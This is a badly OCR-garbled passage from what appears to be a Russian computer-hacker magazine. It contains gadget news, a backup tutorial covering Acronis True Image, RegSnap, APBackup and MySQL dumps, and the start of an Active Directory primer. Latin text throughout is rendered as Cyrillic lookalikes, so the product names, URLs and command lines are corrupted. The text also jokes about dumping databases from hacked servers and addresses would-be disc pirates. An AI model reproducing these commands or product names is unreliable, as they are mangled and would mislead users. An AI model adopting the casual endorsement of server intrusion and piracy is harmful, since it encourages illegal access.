сенсорный аппликатор. Проводки идут к динамикам. Стоит немного сжать 
презерватив или смочить его поверхность, как он начнет издавать весьма 
специфичные звуки. На практике, меняя ритм и глубину погружения 
«отбойного молотка», можно здорово музицировать. При массовом 
производстве стоимость такого презерватива не превысит стоимости 
звуковой открытки. Кондомы будут одноразовыми, а звуковое устройство 
можно использовать многократно. ■ 




НП ВИРУСНОСТЬ 

Т воя тачка обвешана целым арсеналом антивирусов, файрволов, винда об- 
новляется ежечасно, и ты уверен в том, что ни одна зараза не проникнет? 
Теперь у тебя появилась реальная возможность проверить систему на устойчи- 
вость. Для этого топай по адресу шм.дИ.сот/епаіІ$есигіГуГе$Е, вводи свой почто- 
вый адрес и получай на мыло объемную пачку вирья и троянов. Услуга предос- 
тавляется безвозмездно. К счастью, подарок приходит только после подтверж- 
дения «заявки», так что засылать кому попало такие презенты не удастся. ■ 




ШІНЕІЕ88 

НЛ ПРЕОЕЛЕ 



ЖЕЛЕЗО 



К омпания Ыпкзуз разработала 
целую линейку ѵѵігеіезз-уст- 
ройств стандарта 802. 1 1 д. Однако 
не все так банально, приятель. 
Стараясь увеличить скорость рабо- 
ты своего беспроводного оборудо- 
вания, специалисты Ыпкзуз реши- 
ли использовать антенны, выпол- 
ненные с использованием техноло- 
гии МІМО (тиШрІе-іприІ, тиіііріе- 
оиіриі). Эта архитектура подразу- 
мевает использование нескольких 
принимающих и передающих ан- 
тенн, а так же специальную техно- 
логию обработки сигнала, что и 
позволяет увеличить пропускную 
способность оборудования. 

Вообще сейчас над МІМО работает 
куча специалистов самых разных 
компаний и технология бурно раз- 
вивается: МІМО предусматривает- 
ся спецификацией ІЕЕЕ 802. 1 1 п. 
Однако, в Ыпкзуз инженеры - ура- 
ган и они намеревается реализо- 
вать МІМО в оборудовании для се- 
тей на старом 802. 1 1 д стандарте. 
В частности, МІМО уже использует- 
ся в маршрутизаторе ѴѴігеІезз-0 
(ѴѴВТ540Х) и адаптере ѴѴігеІезз-0 
РС СагсІ (ѴѴРС540Х). Обе системы 
выполнены на чипсете Аігдо 
Меѣл/огкз АОІМЮО. 

По словам менеджеров Ыпкзуз, уст- 
ройства с поддержкой МІМО прош- 




ли сертификацию альянса и являют- 
ся обратно совместимыми с систе- 
мами для сетей 802.1 1 Ь/д. Новинки 
уже поступили в продажу, цена 
маршрутизатора ѴѴігеІезз-С Воиіег 
составляет около 200 долларов, кар- 
ты - около 130 долларов. 

Вот ТТХ ѴѴРТ540Х: 

А Поддерживаемые стандарты: ІЕЕЕ 802.3, 
ІЕЕЕ 802.3и, ІЕЕЕ 802.11д,ІЕЕЕ 802.111) 

А Каналы: 11 в США и Канаде, 13 в Европе 
А Порты: ШІ- 10/100 Щ-45, ЕАИ- 
4 порта 10/100 КѵІ-45 
А Индикаторы: питания, ШІ, ѴѴігеІезз, 
ЕШегпеі (1, 2, 3, 4), Ш 
А ЗРГсрайрволла 

А Шифрование, безопасность: ТКІР, АЕ$, 
802.ІХ, МЕР, фильтрация МАО 
А Габариты: 162x162x40 мм 
А Масса: 0,45 кг. ■ 
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пиратский станок 



ЖЕЛЕЗО 



Н овый станок для тиражирова- 
ния СО и дисков предста- 
вила недавно компания 
МісгоЬоагсІз. Выпущенная станция 
позволяет производить диски с 
низкой себестоимостью, в боль- 
ших количествах и с профессио- 
нальным качеством печати. ОХ-2, 
а именно так называется предс- 
тавленный станок, использует ав- 
томатизированную технологию 
Ще\ от НеѵѵІеН- РаскагсІ . Софт, 
поставляемый вместе с устрой- 
ством включает ЗигеТЫпд, прог- 
рамму для обработки наклеек на 
диски, и РгаззіТесРі 2иІи 2, при по- 
мощи которой осуществляется 
непосредственное управление 
станцией. Что касается скорости 
работы станка, то за 8 часов рабо- 
ты станция может изготовить до 
600 дисков! Встроенный принтер 
способен печатать с разрешени- 
ем до 4800 сірі. Если ты решил за- 
няться пиратством, будет полезно 
ознакомиться с основными харак- 
теристиками новой девайсины: 




А Два 52х пишущих СО-привода или, 

16х ОѴО-резака 

А Печатный движок Ргіпі Расіогу 

А Функция асинхронной записи 
и печати 

А Софт для разработки лейблов на диски 
ЗигеТбіпд и записи Ргаззі 
Тесбпоіоду Ш 

А Интерфейс РігеѴѴіге 800 (13946) 

А Поддержка записи двухслойных 0Ѵ0 

А Поддержка всех популярных 
форматов дисков 

А Полная поддержка технологий СО 
Техі, СР Ехіга, Рге-Оар, Ж, ІЖ 



А Возможность работы со всеми попу- 
лярными форматами образов дисков 
(,і$о, .Ьіп, .сие и др.) 

А Поддержка пакетного режима работы 
А Возможность подсоединения двух 
станций к одному ПК 
А Входная емкость -100 дисков 
А Размеры: 22,5 х 60 х 60 см 
А Подключение к компу: принтер - ІІ$В 
1.1 или 2.0, пишущий привод - РігеМге 13946 

Чтобы станция нормально могла 
функционировать, нужен компью- 
тер со следующей конфигурацией: 

А 13946 РСІ-карта (поставляется вместе 
с устройством) 

А ѴѴіпсІоѵѵз 2000 $Р4, 

№п(1оѵѵ$ ХР РгоРеззіопаІ $Р1 
А Р4 2.0 ГГц 
А РАМ 512 Мб 

А Отдельный жесткий диск (ЮЕ или 
5АТА, желательно побыстрее). 




ПЕПЕПЬНИІМ 



ЖЕЛЕЗО 



Я понская компания ТРіапко (шѵѵ.Мапко.Ір) выпустила ІІЗВ-пепельницу с вентилятором и сменными угольными фильт- 
рами. Стильный блестящий гаджет имеет 17 сантиметров в диаметре, 9 сантиметров в высоту и весит 460 грам- 
мов. Альтернативным источником питания может служить пара батареек ААА. Работающий кулер втягивает дым от 
сигарет и пропускает его через специальный фильтр. Сей полезный агрегат можно заказать через интернет всего 
за 39 долларов. ■ 




шинка опя 

СОТОВОГО 



НІТЕСН 



Ф инский дизайнер мебели Антти Еваваара ор- 
ганизовал выпуск телефонных будок для мо- 
бильников. В отличие от традиционных кабинок, 
эти не имеют встроенных аппаратов. Будки 
Зііепсе располагаются вблизи оживленных пе- 
рекрестков и в многолюдных общественных мес- 
тах. Одни модели выглядят как классический так- 
софон. Другие напоминают кресла для сушки во- 
лос в парикмахерской. Прозрачная панель обес- 
печивает хорошую звукоизоляцию. В такой будке 
можно спокойно говорить по сотовому, не перек- 
рикивая рев отбойного молотка и не переходя на 
шепот. По опросам, сейчас с этой целью обычно 
уединяются в сортире. Покупатели кабинок 
Зііепсе могут выбрать между 67 опенками цвета, 
но самым популярным остается ярко-красный. ■ 



ХОЛОДНОЕ 

ТЕЛЕВИДЕНИЕ 



Б елорусские ученые сделали гениальную вещь 
- встроили 15-ти дюймовый телевизор в хо- 
лодильник. С первого взгляда кажется, что функ- 
циональной нагрузки у изобретения ноль, но 
присмотревшись, понимаешь, что для жителей 
малогабаритных квартир стран экс-СССР такая 
экономия места может оказаться очень выгод- 
ной. Экспериментальная установка была предс- 
тавлена 29-го января на выставке, посвященной 
Дню белоруской техники. Было неплохо, если бы 
разработчики добавили функцию просмотра 
внутренностей холодильника на экране, но об 
этом пока не сообщается. ■ 
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абавно. Народ месяцами отлаживает правила своего файрвола, каждую неделю обновляет антивирусные базы и устанавливает свеже- 
вышедшие заплатки на ось. После этого он думает, что обеспечил безопасность компа, огородил себя от всего. Да чушь собачья! 
9 меня в файрволе прописан лишь пяток-другой правил, а антивируса на компе никогда не было. Но ни один мой файл не пострадап 
от вирусной атаки, не был украден злыми хакерами. Зато такая мелочь, как скачок напряжения в электросети, совсем недавно напрочь покоси- 
ла весь мой системник, а вместе с ним и кучу инфы. Безвозвратно. Навсегда. Ты еще спрашиваешь, зачем нужен бэкап? 



КОМПЛЕКСНЫЙ БЗКРП СИСТЕМЫ 




Л СОЗДПЕМ ОБРЙЗ 




становить Асгопіз Тше Ітаде 
несложно: все действия более 
чем стандартны. Во время ус- 
тановки тебе будет предложе- 
но создать специальный заг- 
рузочный диск (или дискеты). 
Советую не откладывать это 
действие в долгий ящик и 




Даже такой примитивный, интегрированный в материнскую 
плату массив может сослужить неплохую службу. Не стоит 
им пренебрегать 



согласиться. Вся процедура займет не более 
пары минут, зато в случае чего у тебя будет 
откуда загрузиться и восстановить повреж- 
денную систему. 

Будь проще, и люди к тебе потянутся. Похо- 
же, именно эту фразу используют в качестве 
девиза наши соотечественники - сотрудники 
Асгопіз’а. Интерфейс Тше Ітаде’а имеет 
очень опрятный красивый вид. Ничем 
экстраординарным он не отличается, зато 
понятен и доступен. Описывать ничего не 
буду - перейдем сразу к делу. 

Логичнее всего начать с создания образа 
диска. По умолчанию слепки Тше Ітаде’а 
имеют расширение *ТіЬ и могут содержать 
копии сразу нескольких разделов винчесте- 
ра. Причем в сам образ копируются данные 
только с занятых секторов раздела, попутно 
упаковываясь с заданной степенью компрес- 
сии. Получается, что образ раздела в боль- 
шинстве случаев имеет значительно мень- 
ший объем, нежели сам диск. Хотя даже в 
этом случае вполне может возникнуть необ- 
ходимость разделить получившийся файл на 
несколько более мелких. Например когда ты 
хочешь записать образ на несколько Сй или 
0\Ю, что вполне логично. И проблем с этим 
возникнуть не должно. Мастер, руководящий 
созданием образа, способен выполнить это 



уже на первой стадии. Он же контролирует 
и все остальные действия программы, снаб- 
жая юзера ценными советами. 

Если ты создаешь образ какого-то конкрет- 
ного раздела не в первый раз, то визардом 
будет предложено сгенерировать так называ- 
емый инкрементный образ. Такой образ со- 
держит данные только с тех секторов диска, 
которые были изменены с момента создания 
предыдущего слепка, независимо от того, 
инкрементный он был или полный. Получив- 
шийся в результате такого действия файл 
имеет кардинально меньший объем, нежели 
первоначальный полный образ, а на его соз- 
дание уходит значительно меньше времени. 
Однако его одного недостаточно для после- 
дующего восстановления раздела. Он не со- 
держит полной информации о диске, поэто- 
му процедура восстановления возможна 
только при наличии предыдущих образов. 

Как минимум нескольких, но в идеале - всех 
инкрементных и первоначального полного. 

И мой тебе совет: к этому идеалу стремись, 
потому что заведомо предугадать точное ко- 
личество инкрементных образов, необходи- 
мых для восстановления, невозможно. Зачем 
же тогда рисковать и удалять лишние обра- 
зы, если нет гарантии восстановления? Вот 
именно: незачем. Тем более, хранить все 
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Выбираем разделы для создания образа 



сконструированные слепки совсем не сложно. 
Они занимают минимум места, а создаются 
очень просто и быстро, а вкупе со встроен- 
ным планировщиком - и вовсе автоматически, 
без твоего вмешательства. 

Создаваемый образ можно сохранить как на 
жестком диске, так и на удаленном сетевом. 
Помимо этого, поддерживается прямая за- 
пись на СЭ-РМ/ и ОѴО-ПѴѴ. В последнем слу- 
чае мастер даже самостоятельно определит 
размер томов выходных файлов. 

Новшество последних версий программы - 
Асгопіз Зесиге 2опе. Специально созданная 
область на жестком диске, невидимая для 
операционной системы и приложений. Она 
доступна только Асгопіз Тше Ітаде’у, поэто- 
му хранящиеся в ней образы защищены от 
обращения извне. Следовательно, и от по- 
тенциальных повреждений или изменений. 

Л ЮЗПЕМ ОБРПЗЫ 

В любой момент сгенерированные слепки 
можно подключить в качестве дополнитель- 
ного раздела, извлечь из них какие-либо 
файлы, ну и восстановить с их помощью не- 
обходимый раздел. Примечательно, что опе- 
рация восстановления диска осуществляется 
несколькими способами. Так, если нужно 
восстановить обычный, не системный диск, 
действие осуществимо в режиме реального 
времени. Другими словами, безо всякой пе- 
резагрузки, прямо из-под ѴѴіпсІоѵѵз с по- 
мощью соответствующей функции програм- 
мы. Раз, два - и готово! В случае, когда тре- 
буется восстановить раздел с установленной 
рабочей осью, оптимальным вариантом явля- 
ется Асгопіз Зіаііир Ресоѵегу Мападег (для 
его запуска жми клавишу Р1 1 во время заг- 
рузки компьютера). Ну а если загрузочный 
раздел поврежден и такой возможности не 
имеется, то тебе сам Бог велел воспользо- 
ваться загрузочным диском, созданным во 
время установки. Не забыл о таком? :) 
Оболочка восстановления максимально пов- 
торяет ХР-интерфейс. Так что в полевых ус- 
ловиях осваивать что-то новое тебе не при- 




дется. В случае загрузки со сменного носите- 
ля оболочка полностью осядет в оперативной 
памяти компьютера. А это значит, что ты мо- 
жешь смело извлечь загрузочный компакт и 
поставить вместо него диски с образами. 
Помимо этого, она комплектуется сетевыми 
драйверами, что позволяет использовать об- 
разы, доступные только в локальной сети. В 
последнем случае есть одна тонкость. Если 
твой компьютер находится в рабочей группе, 
то проблем возникнуть не должно. Но если 
же в сетке присутствует контроллер домена, 
то в большинстве случаев придется провести 
авторизацию. Имя пользователя должно 
иметь следующий синтаксис: домен\пользо- 
ватель. После этого все пойдет как по маслу. 

Л БЭКОП РЕЕСТРО 

Реестр - дело тонкое. От него зависит рабо- 
тоспособность системы, ее быстродействие 
и стабильность. Поэтому и уход за ним дол- 
жен быть соответствующим. И здесь речь 
идет даже не о различных горничных реест- 
ра, подчищающих паразитные ветки, пара- 
метры с нулевыми значениями и т.п. Просто 
иногда может быть полезным создание слеп- 
ков реестра, точных копий всех его веток с 
ключами и их значениями. Захотел поставить 
новые программы, поэкспериментировать с 
различными системными настройками - сде- 
лай бэкап реестра. Если результат тебя уст- 
роит - отлично, оставляем изменения. Нет? 
Тогда в два клика можно вернуть все в исход- 
ное состояние. По сути, здесь даже можно 
обойтись обычным гедебіТом, сохраняя раз- 
дел за разделом весь реестр. Но это не наш 




Внешний вид Асгопіз Тгие Ітаде'а 



метод! Можно сделать куда проще и, что са- 
мое главное, лучше. Позволь представить те- 
бе изумительные утилиты ПедЗпар (ѵѵш.еісот- 
$оГС.сот) и АбѵапсесІ Недізігу Тгасег 

(шѵѵ.Іа$Ші.сопі). 

Обе программы очень схожи по функциональ- 
ности. Описывать каждую из них по отдель- 
ности нет необходимости, поэтому подробнее 
остановлюсь только на первой. ПедЗпар - 
программа не новая и уже успела зарекомен- 
довать себя в глазах компьютерных гиков. Не 
так давно ее полностью переписали, и сей- 
час, как мне показалось, она работает на по- 
рядок быстрее, чем все ее конкуренты. Итак, 
что она умеет? Прежде всего стоит отметить 
идеальную технику создания снимков реест- 
ра. Точнее, не только реестра, а еще файлов 
ѵѵіп.іпі, зузіет.іпі, аіЛоехес.ЬаІ, сопйд.зуз и 
списка файлов, находящихся в каталогах 
ѴѴіпсІоѵѵз, ѴѴіпбоѵѵ5\Зу5іет, Му йоситепіз и 
Ргодгат Рііез. Коньком программы является 
функция сравнения между собой снимков ре- 
естра, выявление различий. Благодаря сним- 
кам, сделанным до и после установки подоз- 
рительной программы, сразу станет ясно, как 
и где закрепилась на машине исследуемая 
прога. Для тех случаев, когда в список изме- 
нившихся значений постоянно попадают лиш- 
ние ключи, в арсенале ПедЗпар’а предусмот- 
рены специальные фильтры. Занеси назойли- 
вые имена в список исключений, и прога 
больше не будет засорять ими отчет. 
Специально для отмены всех изменений 
ПедЗпар может сгенерировать гед-файл, а 
при необходимости открыть стандартный ре- 
дактор реестра и выбрать активную ветку. 

К сожалению, обе программы не имеют встро- 
енного планировщика для создания бэкапа по 



ЧЕЕ> 

л На нашем диске 
ты найдешь пол- 
ные версии прог- 
рамм, описанных 
в этой статье. В том 
числе Асгопіз Тше 
Ітаде, РедЗпар, 
АсІѵапсесІ Ведізігу 
Тгасег, АРВаскІІр. 




л Этот софт не 
вошел в обзор, но 
тоже заслуживает 
внимания. 
а РагЗіопе ВезІогІТ 
(ѵѵѵѵѵѵ.іагзіопе.сот) 
Зутапіес ИоПоп 

А СІ103І 

(ѵтѵѵ.зутапіес.сот) 
а Веігозресі ВаскІІр 
(ѵѵѵіл/ѵ.сіапіг.сот) 
а ппВаскир 
(ѵѵѵѵѵѵ.ппсгоп.ги) 
а ВасШР 2004 
(ѵлмѵ.Ьаскир2004.сот) 
а ЕазеВаскир 
(ѵѵѵіл/ѵ.кіезоП.сот) 




Внимание! Идет сканирование реестра... 
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Экспортируем давнишний бэкап в КЕ6-файл 



Мастер создания образа реестра 




л Прежде чем ра- 
ботать с образами 
дисков, позаботься 
об обеспечении 
бесперебойного 
питания компьюте- 
ра. Если внезап- 
ный всплеск нап- 
ряжения заставит 
тебя врасплох, пос- 
ледствия могут 
быть весьма и весь- 
ма печальными. 




расписанию. Но не беда! Зато обе поддержи- 
вают работу из командной строки, а значит 
можно без труда запустить программу с нуж- 
ными ключами с помощью стороннего софта. 
Синтаксис создания снимка в РедЗпар’е таков: 

гедзпар /з тобе гетоіе заѵеЭІІѴегІпЕо гетагк РіІеИате 

Здесь тобе - режим (0 - снимать все, 1 - 
только реестр, 2 - удаленный реестр), гетоТе 
- сетевое имя компьютера в случае удаленной 
работы, заѵеОІІѴегІпТо - флаг сохранения ин- 
формации о версиях ЭИ (1 - да, 0 - нет), 
гетагк - комментарий к снимку, ТМеМате - 
имя для создания снимка. Для того чтобы 
сделать снимок реестра с локальной машины 
в файл МуЗпар без указания версий ОН, что 
значительно ускоряет процесс бэкапа, нужно 
запустить РедЗпар следующим образом: 

КедЗпар /$ 0 "" 0 "" туЗпар 

Разобрался? Отлично, тогда можешь смело 
скармливать эту командную строку стандарт- 
ному планировщику винды. Но учти, каждый 
новый снимок будет перезаписывать преды- 
дущие. Если тебя это не устраивает, что сов- 
сем не удивительно, то в качестве помощни- 
ка придется использовать другую софтину, 
описанную в прошлом номере журнала, - 
ппСгоп (мѵѵшСгоп.ги). 



^ о как же Файлы? 

Среди массы утилит по резервному копиро- 
ванию файлов мне более всего приглянулась 
АРВаскІІр (шѵшрзоГСді). Прога на первый 
взгляд может показаться слишком простой, 
любительской что ли. Во многом потому, что 
ее дистрибутив весит всего лишь два метра. 
Но поверь мне, первое впечатление обманчи- 
во. При более пристальном осмотре стано- 
вится ясно, что утилита имеет богатый арсе- 
нал и включает в себя все самое нужное. 

Во время первого запуска АРВаскІІр’а поль- 
зователя радужно приветствует специальный 
мастер. Многого он от тебя не требует: нуж- 
но лишь указать параметры первого задания. 
Вкратце опишу эту процедуру. Во-первых, 
здесь задается тип бэкапа (архивирование 
данных или простое их копирование в указан- 
ную директорию или на РТР-сервер). Во-вто- 
рых, осуществляется выбор файлов для резе- 
рвного копирования. При этом допускается 
обработка сразу нескольких директорий, как 
с локальных, так и с удаленных дисков. При- 
мечательно и то, что поддерживается копи- 
рование файлов по маске. К примеру, можно 
заархивировать все файлы *.бос из какой-ли- 
бо директории и в то же время пропускать 
оттуда же все *.тсІЬ. В-третьих, мастеру ука- 
зывается время/периодичность запуска зада- 
ния и место назначения бэкап-файлов. Если 



используется архивация, то к этому списку 
добавляется еще парочка настроек. С по- 
мощью мастера задается пароль на архив, а 
также редактируется шаблон имени выход- 
ных файлов. Имя архива может содержать 
специальные макросы: дату, время, месяц, 
год и т.д. Имеется еще один интересный па- 
раметр - глубина архива. Суть его объясню 
на примере. Допустим, этому параметру ус- 
тановлено значение 3. Тогда после очередно- 
го выполнения данной задачи будут удалены 
все архивы, кроме трех последних. Очень 
удобная фишка. 

Но это еще далеко не все! Полные настройки 
каждого из созданных заданий доступны пос- 
ле завершения работы мастера. Различных 
параметров здесь уйма! Если ты хочешь отп- 
равлять бэкапы по е-таіі - будь добр, укажи 
настройки 8МТР-сервера. Хочешь хранить 
архивы на удаленном РТР’шнике? Нет проб- 
лем, главное - укажи параметры соединения. 
Я вот складирую бэкапы на файловом серве- 
ре в локалке. Поэтому для меня особенно ак- 
туальны настройки локальной сети. 

Несмотря на то что АРВаскІІр имеет встроен- 
ный архиватор 1\Р (2ІР64 - формат для фай- 
лов более 4 Гб), прога может быть настроена 
на работу с любым другим внешним упаков- 
щиком, что особенно должно порадовать 
поклонников ВАВ’а. Мало того, в случае не- 



А Если ты постоян- 
но бэкапишь ка- 
кой-либо раздел 
(к примеру, сис- 
темный) с по- 
мощью инкремент- 
ных образов, то, 
по всей видимос- 
ти, тебе придется 
отказаться от ис- 
пользования прог- 
рамм-дефрагмен- 
таторов. Послед- 
ние кардинально 
изменяют таблицу 
размещения фай- 
лов, что заставляет 
Тше Ітаде записы- 
вать в инкремент- 
ный образ огром- 
ное количество до- 
полнительной ин- 
формации. А это, 
естественно, вле- 
чет за собой увели- 
чение его размера. 
Делай выводы. 
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Залить бэкапы на РТР не просто, а очень просто! 



Остановки задания 



Пауза задания (миллисекунды) после каждого 1 % выполнения задания 


100 




Пауза задания (миллисекунды) после каждого заархивированного Файла 


0 
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Контролируем загрузку процессора 
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БЭКПП БОЗЫ МѴ8ІЦ 



Очевидно, что резервное копирование баз данных - 
это отдельная тема для разговора. Слишком много 
вариантов, нюансов и тонкостей. Сейчас я хочу кос- 
нуться этой темы лишь отчасти. А именно описать 
процедуру создания бэкапа базы МуЗОІ_. С ней те- 
бе наверняка приходится работать больше всего. 

По крайней мере, будешь знать, как слить базу со 
взломанного сервера :). 

Для создания дампа используется следующая 
команда: 

тузцісіитр -ор{ <имя_базы> <имя_файла>.зцІ 
Дамп нескольких баз одновременно 
осуществляется так: 

тузцісіитр -сІаІаЬазез <имя_базы1> [<имя_базы2> ..] 
<имя_файла>.зцІ 

А если необходим дамп сразу всех баз данных, то 
так: 

тузцісіитр -1аЬ=</каталог/назначения> -орі --аІІ 
Когда нужно перенести базу на другой сервер, 
совсем не обязательно копировать и импортировать 
дамп вручную. Вполне подойдет следующая 
команда: 

тузцісіитр -орі <имя_базы> I тузці -ИозІ=<адрес удаленного 
сервера) -С <имя_базы> 

Чтение базы из файла-дампа осуществляется 
самой МуЗцІ: 

тузді <имя_базы> <имя_файла>.зд! 




Работаем с КедЗпар'ом из командной строки 



обходимости бэкапер способен запустить какое-либо стороннее приложе- 
ние до и после выполнения определенных заданий. Учти, что между за- 
пуском приложения и выполнением задания можно установить опреде- 
ленный промежуток времени - таймаут. Очень полезная фишка. Если ты 
всерьез задумался о хранении бэкапов на удаленном компьютере, рабо- 
тающем далеко не всегда, то тебе грех ею не воспользоваться. Просто 
через ѴѴаке-оп-Іап включай компьютер, дай ему время загрузиться (тай- 
маут - 5 минут) и только после этого выполняй задание. 

Одновременное выполнение нескольких заданий может сильно загрузить 
компьютер. Для того чтобы этого не происходило, в программе предус- 
мотрен ряд параметров, ограничивающих загрузку процессора. Так, каж- 
дое задание способно устанавливать приоритет на поток архивации (ре- 
комендую выставить его по умолчанию). Плюс к этому, загрузка СРІІ ре- 
гулируется с помощью специальных пауз между итерациями процесса ар- 
хивирования. А если вдруг случится непредвиденное и загрузка СРІІ дос- 
тигнет критической отметки, например 80%, АРВаскІІр может остановить 
выполнение задания. И это отнюдь не значит, что навсегда! В случае неу- 
дачного выполнения любое задание будет запущено вновь через опреде- 
ленный промежуток времени. Вновь и вновь, до полного завершения. 
Складывается впечатление, что в АРВаскІІр все продумано до мелочей. 
Бэкапер отлично справляется с обработкой атрибутов файлов и ІМТРЗ- 
прав, на ура справляется с ситуацией, когда копируемый файл занят дру- 
гим приложением. Помимо всего прочего, АРВаскІІр способен отслежи- 
вать изменения файловой системы и стартовать задания только при из- 
менении содержимого директорий. Однозначно, тизі Маѵе! 

А ТОЧКИ 0ТСЧЕТ0 

Быть может, после прочтения этой статьи что-то в твоем сердце затрепещет, 
и ты уделишь пару часиков настройке всех этих прог. Жить без бэкапа - это 
все равно что ходить по лезвию ножа. Сегодня тебе повезет, а завтра, воз- 
можно, уже нет. Прикинь и тщательно взвесь, что тебе нужно. И действуй! В 
твоем распоряжении богатый набор инструментов. □С 




Совершенный звук 
в совершенной форме 



Элегантная акустическая система 
Э В-381 создана, чтобы стать частью 
Вашего стиля. 

Выходная мощность: 

Диапазон воспроизводимых частот: 
Соотношение сигнал/шум: 

Звуковое давление: 



Высокое качество звучания 
позволяет в полной мере наслаж- 
даться красотой любимых мелодий. 

60 Ватт 
30 Гц - 20 кГц 
85 дБ 
89 дБ 



ЗВ-381 - победитель соревнований «ММ-звук» по качеству звучания. 



ѵѵѵѵѵѵ.іеІЬаІапсе.ги 

МЕВиОІЧ-СіШпк МЕВиОЫ-Оепікіп 
+7(095)744.0333 +7(095)787.4999 

МЕВЫОІЧ-ЕІзіе МЕВІ_ЮІ\І-І_І 2 агсІ 
+7(095)777.9779 +7(095)780.3266 



Лз ЗеІЬаІапсе 
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■ Степан Ильин ака 8(ер (зіершеаі.хакер.пі) 



■ последнее время все чаще и чаще на адрес нашего ГПЦ’а приходят письма с просьбами объяснить, что такое Псііѵе Оігесіогу. Очень 
странный ажиотаж. Десять одинаковых вопросов за два месяца - это нонсенс. Хотя тенденция вполне закономерная. Оббревиатура ПО 
(Псііѵе Оігесіогу) в рунете, да и не только, встречается сплошь и рядом. Однако хорошей инфы по теме не так уж и много. Все больше и 
больше попадаются подробные мануалы, касающиеся настройки и решения многочисленных проблем с ПО. Мы же в такие дебри лезть пока не 
будем. И пока просто разберемся, что представляют собой эти активные директории. Может быть, это не такой уж и дикий зверь? 

ТЕХНОЛОГИЯ ПСТШЕ ОІНЕСТОКѴ 0 РОЗРЕЗЕ 



А ДОМЕН И Р0Б0Ч0Я ГРУППП 

режде чем описывать архитек- 
туру АО, неплохо было бы 
вспомнить такие старые поня- 
тия, как домен и рабочая груп- 
па. Итак, какая между ними 
разница? Рабочая группа - это 
объединение сетевых компью- 
теров, предоставляющих уда- 
ленный доступ к своим ресурсам, то есть 
файлам, принтерам и т.п. Такой подход не 
подразумевает использования выделенного 
сервера, а посему используется в небольших 
локалках. Компьютеры в такой сети использу- 
ют равномерный доступ к своим ресурсам, 
причем каждый из них имеет свою собствен- 
ную БД безопасности. Проще говоря, на каж- 
дом компьютере четко прописывается, какие 
пользователи к каким ресурсам имеют доступ. 
Такая децентрализация администрирования 
учетных записей, естественно, не очень удоб- 
на. Любому новому пользователю приходится 
создавать аккаунт на каждой из машин. Если 
не прописать аккаунт хотя бы на одной из них, 
то юзер не сможет получить к ней доступ. 
Доменная структура в этом смысле куда бо- 
лее привлекательна. Основной ее козырь - 
централизованная система аутентификации. 
Все учетные записи пользователей домена 




хранятся в одном -единственном месте - 
в контроллере домена. Последний обычно 
представляет собой специально выделенный 
компьютер с серверной ОС. Когда пользова- 
тель входит в домен, контроллер проверяет 
по каталогу (БД учетных записей домена) его 
имя с паролем и выдает соответствующие 
полномочия. Преимущество такого подхода 
очевидно. Пользователя нужно прописать 
только один раз на контроллере домена. 

А ПРИЧЕМ ТУТ 00? 

Асііѵе Оігесіогу - логическое развитие домен- 
ной системы. По сути, это своеобразная 
надстройка над имеющейся схемой. Техноло- 
гия, ставшая неотъемлемой частью сервер- 
ных версий ѴѴіпсІоѵѵз 2000/2003, предоставля- 
ет еще большие возможности, чем доменная 
система. Асііѵе Оігесіогу позволяет эффек- 
тивно создавать открытые сетевые ресурсы, 
управлять ими и оперировать связанной ин- 
формацией. Помимо этого, АЭ выступает в 
качестве центрального узла аутентификации, 
то есть контролирует процесс входа юзеров в 
сеть и, руководствуясь настройками, выдает 
им соответствующие привилегии. 

В умных книжках Асііѵе Оігесіогу называют 
службой каталогов нового поколения. Едва 
ли тебе это что-то сказало, поэтому предла- 



гаю разобраться с понятием «каталог». Ката- 
лог (сіігесіогу) - это база данных с информа- 
цией об объектах, связанных между собой 
определенными отношениями. К примеру, 
в оглавлении нашего журнала фигурируют 
названия статей (объектов) и соответствую- 
щие им номера страниц (описание по опре- 
деленному параметру). Но оглавление может 
содержать и другую полезную инфу: напри- 
мер, аннотации к каждому из материалов 
(это уже другой параметр). Ситуация в точ- 
ности повторяется в компьютерных сетях. 
Объекты здесь, разумеется, другие: рабочие 
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ОКТИВНЫЕ ДИРЕКТОРИИ 
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Пример иерархии доменов 



станции, файловые серверы, принтеры, 
службы факсов, приложения, базы данных. 
Характеристики и параметры тоже свои. Но 
смысл остается тем же: каталог, как и оглав- 
ление журнала, содержит полную инфу о хра- 
нимых в нем объектах. Служба каталогов 
нужна хотя бы для того, чтобы этими самыми 
каталогами управлять. Однако это не означа- 
ет, что она занимается исключительно мони- 
торингом и протоколированием информации. 
Все это хозяйство нужно администрировать и 
держать под четким контролем. Это непросто 
даже в небольших локалках со скромным ко- 
личеством машин. Что тут говорить о корпо- 
ративных, где дело вообще труба? Поэтому 
если для рядового пользователя локалки АО - 
это лишь источник информации, в том числе 
технически необходимой для входа в сеть, то 
для админов это еще и мощное средство ад- 
министрирования. Ведь, помимо хранения 
информации, Асііѵе Эігесіогу способна решать 
задачи по обработке доменных имен и запро- 
сов, регистрации новых пользователей и т.п. 
Но давай-ка лучше обо всем по порядку. 

А ИЕРОРХИЧЕСКОЯ СИСТЕИО 

Одним из основных достоинств Асііѵе 
Эігесіогу является возможность создания в 
одном домене огромного числа объектов, 
вплоть до нескольких миллионов. Конечно, 
ты можешь возразить и даже аргументиро- 
ванно заметить, что нам это нафиг не нужно. 
И в какой-то степени ты даже прав. Действи- 
тельно, для тебя и меня это не особенно кри- 
тично. Но уверяю, в практике бывалых сис- 
темных администраторов хотя бы раз, но бы- 
ла проблема, напрямую связанная с ограни- 
чениями доменной модели ѴѴіпсІоѵѵз ІЧТ. Ю в 
этом плане на порядок выше. И дело даже не 
просто во впечатляющих числах. Технология 
предоставляет возможность содержать нес- 
колько географически разнесенных доменов, 
связанных между собой каким-либо каналом 
связи. Это особенно актуально, если необхо- 
димо воссоздать в локалке модель какой-ли- 



бо физической структуры (локальной сети по 
районам, организации по отделам и т.п.). Са- 
мое тривиальное решение в этом случае - 
каждому из подразделений создать по доме- 
ну, после чего соединить их в единое целое. 
Сетевые ресурсы для Асйѵе Эігесіогу - это 
объекты, которые имеют ряд свойств. В част- 
ности, для каждого объекта обязательно 
должно быть задано свойство «тип». Вариан- 
тов много: пользователь, группа, документ, 
периферийное устройство, сетевое приложе- 
ние и т.д. Объекты, в свою очередь, могут 
быть сгруппированы в контейнер, а совокуп- 
ность и тех и других может быть представлена 
в виде древовидной структуры. Последняя 
крайне наглядно отображает имеющиеся свя- 
зи и иерархию. Это легко понять. Вспомни хо- 
тя бы, как в проводнике отображается дерево 
папок и файлов. Здесь примерно то же самое. 
Немаловажно то, что имеющаяся структура ка- 
талогов может быть оперативно и легко изме- 
нена. В каждой конторе, где я администрирую 
